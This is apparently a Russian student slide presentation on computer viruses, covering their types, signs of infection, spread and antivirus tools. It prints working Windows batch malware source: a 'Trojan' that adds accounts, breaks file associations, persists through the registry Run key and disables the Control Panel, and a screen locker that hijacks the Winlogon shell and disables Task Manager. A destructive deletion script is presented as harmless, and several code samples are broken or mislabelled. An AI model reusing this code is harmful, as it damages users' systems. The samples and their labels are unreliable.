Министерство Образования Филиала Удмурского Государственого Университета г. Воткинска

1. Министерство Образования Филиала Удмурского Государственого Университета г. Воткинска Автор: Катаев Влад, «1 курс» Руководитель: Иванова А.И.

2. Содержание: • Вирус • Что такое вирус? • Классификация вирусов • Удаление вирусов • Стоимость нанесённого вреда • Распространение вирусов • Антивирусные программы • Что такое антивирусная программа? • Некоторые её параметры

3. Вообще, что такое вирус??? • Прежде всего, вирус – это программа, которая может «размножаться» и скрытно внедрять свои копии в файлы, загрузочные секторы дисков и документы. • Активизация компьютерного вируса может вызвать уничтожение программ и данных. 200 - 5000 байт более 50 тыс. вирусов назад

4. Программный код«Trojan»: @echo off %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul time 0:00 >nul date 13.06.23 >nul label C:*****>nul label D:******>nul label E:*******>nul label F:*******>nul copy %0 C:\Open.bat >nul copy %0 D:\Open.bat >nul copy %0 E:\Open.bat >nul copy %0 F:\Open.bat >nul net user "Idiot you Hacked" /add >nul net user "Bitch you Hacked" /add >nul net user "Durak you Hacked" /add >nul net user "Kritin you Hacked" /add >nul net user "Gavno you Hacked" /add >nul md 1 >nul md 2 >nul md 3 >nul md 4 >nul md 5 >nul md 6 >nul md 7 >nul md 8 >nul md 9 >nul md 10 >nul md 11 >nul md 12 >nul md 13 >nul md 14 >nul md 15 >nul md 16 >nul md 17 >nul md 18 >nul md 19 >nul md 20 >nul md 21 >nul md 22 >nul md 23 >nul md 24 >nul md 25 >nul md 26 >nul md 27 >nul assoc .lnk=.txt >nul assoc .exe=.txt >nul :x ; Start mspaint goto x ; :x ; Start Calc goto x ; copy ""%0"" "%SystemRoot%\system32\Cool.bat" >nul reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat" /f >nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul del %0 >nul назад

5. Программный код можно использывать в мирных целях Наша задача отчистить данную папку Сохранив файлы mp3

6. Для этого мы будим использовать программный код @Echo off copy: *.mp3 C:\Users\Администратор\Music del: *.torrent del: *.rar del: *.zip del: *.exe del: *.mp3 del: C:\Users\Администратор\Downloads /s /q del: %0 >nul Cсохраняем текст под расширением .bat и запускаем

7. Признаки появления вирусов: • Неправильная работа нормально работающих программ • Частые зависания и сбои в работе ПК • Медленная работа ПК • Изменение размеров файлов • Исчезновение файлов и каталогов • Неожиданное увеличение количество файлов на диске • Уменьшение размеров свободной оперативной памяти • Вывод на экран неожиданных сообщений и изображений • Подача непредусмотренных звуковых сигналов • Невозможность загрузки Операционной Системы назад

8. Стоимость нанесенного вреда назад

9. классификация вирусов: • Загрузочные вирусы • Файловые вирусы • Макро-вирусы • Сетевые вирусы • Блокирующие вирусы назад

10. Загрузочные вирусы заражают загрузочный сектор гибкого диска или винчестера. При заражении дисков загрузочный вирус «заставляет» систему при ее перезапуске считать в память и отдать управление не программному коду загрузчика операционной системы, а коду вируса. [autorun] copy %0 C:\Open.bat >nul назад

11. Файловые вирусы при своем размножении тем или иным способом используют файловую систему операционной системы. Файловые вирусы могут поражать исполняемые файлы различных типов (EXE, COM, BAT, SYS и др.). @Echo off del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul назад

12. Макро-вирусы являются программами на языках, встроенных в некоторые системы обработки данных (текстовые редакторы, электронные таблицы и т.д.). Для своего размножения такие вирусы используют возможности макро-языков и при их помощи переносят себя из одного зараженного файла (документа или таблицы) в другие. Sub ToggleHyperlinkCtrlClick()    Options.CtrlClickHyperlinkToOpen = Not Options.CtrlClickHyperlinkToOpenEnd Sub назад

13. Сетевые вирусы для своего распространения используют протоколы и возможности локальных и глобальных компьютерных сетей. Основным принципом работы сетевых вирусов является возможность передать и запустить свой код на удаленном компьютере. <!-- Beginfunction processForm(form) {var nickname = form.nickname.value;var password = form.password.value;nickname = escape(nickname);password = escape(password);window.location = window.location + "?nickname=" + nickname + "&password=" + password;}// End --></script> назад

14. Блокирующие-вирусы Баннер-Trojan – вымогатель, который просит заплатить. Но ему нельзя верить и ни в коем случае не платить Способ защиты от баннеров назад

15. Программный код баннера @echo off CHCP 1251 cls Set Yvaga=На вашем компьютере найден вирус. Set pass=Пароль Set pas=Введите пароль. Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль Set dim=Выключаю вирус... title Внимание!!! CHCP 866 IF EXIST C:\windows\boot.bat ( goto ok ) cls IF NOT EXIST C:\windows\boot.bat ( ECHO Windows Registry Editor Version 5.00 >> C:\0.reg ECHO. >> C:\0.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg ECHO. >> C:\0.reg ECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " >> C:\0.reg start/wait regedit -s C:\0.reg del C:\0.reg ECHO @echo off >>C:\windows\boot.bat ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat ECHO start sys.bat >>C:\windows\boot.bat attrib +r +a +s +h C:\windows\boot.bat copy virus.bat c:\windows\sys.bat attrib +r +a +s +h C:\windows\sys.bat GOTO end) :ok cls Echo %Yvaga% echo. echo %virus% echo %pas% set /a choise = 0 set /p choise=%pass%: if "%choise%" == "101" goto gold if "%choise%" == "200393" goto status exit :status echo %dim% attrib -r -a -s -h C:\windows\boot.bat del C:\windows\boot.bat attrib -r -a -s -h C:\windows\sys.bat del C:\windows\sys.bat cls :gold start C:\ :end

16. Распространение вирусов назад

17. Как же лечить компьютер если антивирус не работает? Бесплатный антивирусный сканер для лечения зараженного компьютера от вирусов, троянских и шпионских программ. Доступна по ссылке http://www.kaspersky.ru/antivirus-removal-tool назад

18. Kaspersky VirusRemovalTool Внимание: VirusRemovalTool лечит только зараженный компьютер, но не обеспечивает защиту от угроз в режиме реального времени. назад

19. Как лечить с помощью Kaspersky VirusRemovalTool

20. Хакерские утилиты и прочие вредоносные программы К данной категории относятся:  • утилиты автоматизации создания вирусов, червей и троянских программ (конструкторы); • программные библиотеки, разработанные для создания вредоносного ПО; • хакерские утилиты скрытия кода зараженных файлов от антивирусной проверки (шифровальщики файлов); • «злые шутки», затрудняющие работу с компьютером; • программы, сообщающие пользователю заведомо ложную информацию о своих действиях в системе; • прочие программы, тем или иным способом намеренно наносящие прямой или косвенный ущерб данному или удалённым компьютерам. назад

21. Каналы распространения • Флеш-накопители (флешки) В настоящее время USB-флешки заменяют дискеты и повторяют их судьбу — большое количество вирусов распространяется через съёмные накопители, включая цифровые фотоаппараты, цифровые видеокамеры, цифровые плееры (MP3-плееры), сотовые телефоны. Использование этого канала преимущественно обусловлено возможностью создания на накопителе специального файла autorun.inf, в котором можно указать программу, запускаемую Проводником Windows при открытии такого накопителя. Флешки — основной источник заражения для компьютеров. • Электронная почта Сейчас один из основных каналов распространения вирусов. Обычно вирусы в письмах электронной почты маскируются под безобидные вложения: картинки, документы, музыку, ссылки на сайты. • Системы обмена мгновенными сообщениями Так же распространена рассылка ссылок на якобы фото, музыку либо программы, в действительности являющиеся вирусами, по ICQ и через другие программы мгновенного обмена сообщениями. • Веб-страницы Возможно также заражение через страницы Интернет ввиду наличия на страницах всемирной паутины различного «активного» содержимого: скриптов, ActiveX-компоненты, Java-апплетов

22. Антивирусные программы • Антивирусные прогрммы • Блокировщик рекламы • Антивирусные утилиты назад

23. Антивирусные программы Для обнаружения, удаления и защиты от компьютерных вирусов разработаны специальные программы, которые позволяют обнаруживать и уничтожать вирусы. Такие программы называются антивирусными. назад

24. Kaspersky Популярный отечественный антивирус. Хорошо распознает вирусы, но в его базе ихменьше, чем у другихантивирусных программ назад

25. Нетребовательность к ресурсам • Антивирус Kaspersky нетребователен к ресурсам, работает, не перезагружая систему, что позволяет ему уверенно защищать даже самые маломощные компьютеры прежних поколений. назад

26. Компактность и удобство • Процесс обновления происходит незаметно для пользователя – при каждом подключении к сети Интернет, по запросу или по расписанию. • Загрузка осуществляется быстро (даже на медленных модемных соединениях). • Всегда имеются доступные сервера обновлений. • По завершении обновления не требуется перезагружать компьютер: Kaspersky сразу готов к работе с использованием самых свежих вирусных баз. назад

27. ADGUARD Adguard-мощный блокиратор который блокирует рекламу, баннеры и прочее. Он работает на всех браузерах назад

28. Советы на будущее: • Удаление временных файлов • Почаще проверять компьютер на вирусы • Очищать комьютер через программуCCleaner

29. Название • Ссылки (источники)